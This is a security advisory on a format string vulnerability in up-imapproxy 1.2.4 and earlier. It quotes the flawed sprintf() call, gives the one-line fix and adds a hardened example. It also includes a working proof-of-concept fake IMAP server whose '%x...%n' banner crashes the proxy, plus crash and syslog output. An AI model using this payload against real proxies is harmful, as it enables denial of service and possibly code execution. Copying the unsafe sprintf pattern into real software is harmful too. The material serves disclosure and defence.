[.:: ExploiterZ Labs aka Unl0ck Research Team ::.]
Advisory
target: Imapproxy
version: 1.2.4 and earlier
type: format string
remote: yes
vendor: http://imapproxy.org
patch: none available
[.: Details :.]
A format string vulnerability was found in the latest version (1.2.4)
of the IMAP proxy server up-imapproxy.
Vulnerability exists in:
/up-imapproxy-1.2.4/src/main.c
function: ParseBannerAndCapability();
static int ParseBannerAndCapability( char *DestBuf,
unsigned int DestBufSize,
char *SourceBuf,
unsigned int SourceBufSize )
{
...
SourceBuf[SourceBufSize - 2] = '\0';
CP = strtok( SourceBuf, " " );
...
sprintf( DestBuf, CP );
...
}
This function is called from another function in main.c:
function: SetBannerAndCapability()
static void SetBannerAndCapability( void )
{
...
BannerLen = ParseBannerAndCapability( Banner, sizeof Banner - 1,
itd.ReadBuf, BytesRead );
...
if ( strncasecmp( Banner, IMAP_UNTAGGED_OK, strlen(IMAP_UNTAGGED_OK)) )
{
syslog(LOG_ERR, "%s: Unexpected response from imap server on initial connection: %s -- Exiting.", fn, Banner);
close( itd.conn->sd );
exit( 1 );
}
...
}
As you can see, ParseBannerAndCapability() passes the banner token CP to sprintf() as the format string itself, so any %-directives in the banner are interpreted by the proxy.
The correct call is:
sprintf( DestBuf, "%s", CP );
instead of
sprintf( DestBuf, CP );
Because %x reads words from the stack and %n writes the number of bytes emitted so far through a pointer taken from it, the vulnerability can be used to execute arbitrary code on the target machine.
Imapproxy does not sanitize the banner it receives from the IMAP daemon, so the malicious banner has to come from whatever server the proxy connects to: a server the attacker controls, or a legitimate server's connection intercepted on the way. Look at the PoC code below.
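The following C program is an added example, not code from the advisory or from up-imapproxy. It mirrors only the lines of ParseBannerAndCapability() shown above (strip the CRLF, take the first space-separated token, copy it into DestBuf) in both the vulnerable and the hardened form; the elided remainder of the real function is not reproduced, and the function names, the directive counter and the sample banners are this example's own. The hardened copy also bounds the write with snprintf(), which goes beyond the one-line fix the advisory gives.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable shape: the banner token is the format string. It is here only
 * to show the pattern to look for; never call it with untrusted data. */
static int copy_banner_unsafe(char *DestBuf, char *SourceBuf,
                              unsigned int SourceBufSize)
{
    char *CP;

    SourceBuf[SourceBufSize - 2] = '\0';
    CP = strtok(SourceBuf, " ");
    if (CP == NULL)
        return -1;
    return sprintf(DestBuf, CP);   /* %x leaks stack words, %n writes through them */
}

/* Hardened shape: literal format, token passed as an argument, copy bounded
 * by DestBufSize (the original passes DestBufSize but sprintf() ignores it;
 * snprintf() is an added hardening, not the advisory's patch). */
static int copy_banner_safe(char *DestBuf, unsigned int DestBufSize,
                            char *SourceBuf, unsigned int SourceBufSize)
{
    char *CP;
    int n;

    if (DestBufSize == 0 || SourceBufSize < 2)
        return -1;
    SourceBuf[SourceBufSize - 2] = '\0';   /* drop the trailing CRLF as the original does */
    CP = strtok(SourceBuf, " ");
    if (CP == NULL)
        return -1;
    n = snprintf(DestBuf, DestBufSize, "%s", CP);
    if (n < 0)
        return -1;
    /* report bytes actually stored, so truncation is visible to the caller */
    return n < (int)DestBufSize ? n : (int)DestBufSize - 1;
}

/* Number of conversion directives the unsafe call would interpret if this
 * token reached a printf-family format slot ("%%" is a literal percent). */
static int count_format_directives(const char *s)
{
    int count = 0;

    for (; *s != '\0'; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {   /* escaped percent, no directive */
            s++;
            continue;
        }
        count++;
    }
    return count;
}

/* What one %n does: store the number of bytes written so far through the
 * pointer it consumes. Here the format is a literal and the pointer is ours;
 * in the unsafe call both come from the banner. */
static int percent_n_writes(void)
{
    char buf[32];
    int written = -1;

    sprintf(buf, "AAAAAAAAAA%n", &written);
    return written;   /* 10, the ten 'A's emitted before %n */
}

int main(void)
{
    /* constructed input: the same banner the PoC below sends */
    char banner[] = "AAAAAAAAAA%x%x%x%x%x%n%n%n\r\n\r\n";
    char Banner[256];
    int len = copy_banner_safe(Banner, sizeof Banner - 1, banner, sizeof banner - 1);

    printf("stored %d bytes: \"%s\"\n", len, Banner);
    printf("directives the unsafe call would interpret: %d\n",
           count_format_directives(Banner));
    printf("%%n stores: %d\n", percent_n_writes());
    return 0;
}
```

The hardened copy keeps the banner as opaque bytes: the eight directives survive in Banner unchanged and the later strncasecmp() against "* OK" simply rejects it, which is the behaviour the original error path was written for.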
[.: PoC :.]
/*
PoC exploit code for up-imapproxy <= 1.2.4
by Darkeagle from ExploiterZ Labs
eagle [ at ] exploiterz [ dot ] org

The exploit listens on port 143; when imapproxy connects to this fake IMAP
server and reads the banner, its child process crashes.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>

/* %x pops stack words into the banner, %n writes through the next ones;
   the double CRLF ends the line the proxy reads */
#define BANNER "AAAAAAAAAA%x%x%x%x%x%n%n%n\r\n\r\n"

int main ( int argc, char *argv[] )
{
    struct sockaddr_in addr, cl_addr;
    int sock, cl_sock, on = 1;
    char *Iaddr;
    socklen_t l;

    (void)argc;
    (void)argv;
    printf("Imapproxy <= 1.2.4 PoC Exploit\n");

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    if (sock < 0) { perror("socket"); return 1; }
    /* allow an immediate restart while the old listener is in TIME_WAIT */
    setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on));

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(143);               /* privileged port: run as root */
    addr.sin_addr.s_addr = inet_addr("127.0.0.1");
    if (bind(sock, (struct sockaddr*)&addr, sizeof(addr)) < 0) { perror("bind"); return 1; }
    if (listen(sock, 5) < 0) { perror("listen"); return 1; }

    while (1)
    {
        l = sizeof(cl_addr);                  /* accept() needs the length initialised */
        cl_sock = accept(sock, (struct sockaddr*)&cl_addr, &l);
        if (cl_sock < 0) { perror("accept"); continue; }
        Iaddr = inet_ntoa(cl_addr.sin_addr);
        /* the proxy treats this as the server greeting and formats it */
        send(cl_sock, BANNER, strlen(BANNER), 0);
        printf("IP: %s\n", Iaddr);
        close(cl_sock);
    }
    return 0;
}
[.: Screenshot :.]
.. Child Process crashed ..
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1076593408 (LWP 8279)]
0x401b5904 in vfprintf () from /lib/tls/libc.so.6
(gdb)
...
.. Syslog details (the hex values in the logged banner are the stack words that replaced the %x directives) ..
[root@localhost bin]# tail -10 /var/log/syslog
....
Oct 28 14:12:55 localhost in.imapproxyd[9201]: SetBannerAndCapability(): Unexpected response from imap server on initial connection: AAAAAAAAAbfffc4ccbfffc4ccbfffc4b45bfffd4e8804afb98056E60^M -- Exiting.
[root@localhost bin]#
[.: Credits :.]
Goes to Darkeagle [ eagle { at } exploiterz { dot } org ]
http://exploiterz.org || http://55k7.org
(c) 2004-2005 Unl0ck Research Team